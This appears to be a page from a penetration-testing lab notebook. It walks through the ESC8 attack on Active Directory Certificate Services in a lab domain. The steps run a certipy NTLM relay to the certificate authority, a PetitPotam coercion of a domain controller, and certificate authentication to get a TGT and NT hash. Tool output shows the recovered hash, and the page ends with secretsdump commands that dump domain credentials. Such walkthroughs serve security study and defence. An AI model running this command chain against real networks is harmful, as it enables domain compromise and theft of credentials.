ESC8 - with certipy

ADCS attack tool certipy to automatise a lots of things.

Let’s do the same attack with certipy, setup the listener :

Install Certipy

sudo pip3 install certipy-ad
sudo certipy relay -ca 192.168.56.23 -template DomainController

  • execute the coerce just like we did before with petitpotam

python3 PetitPotam.py 192.168.56.31 baltimore.maryland.local

  • Now we got the certificate so we can get the NT hash of the DC and also the TGT with the command :

sudo certipy auth -pfx baltimore.pfx -dc-ip 192.168.56.12 

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: baltimore$@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'baltimore.ccache'
[*] Trying to retrieve NT hash for 'baltimore$'
[*] Got hash for 'baltimore$@maryland.local': aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759

export KRB5CCNAME=/home/jefe/ADCS/baltimore.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local

# or with the hash

secretsdump.py -hashes ':aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759' -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local
PreviousESC8 - coerce to domain adminNextADCS - ESC1

Last updated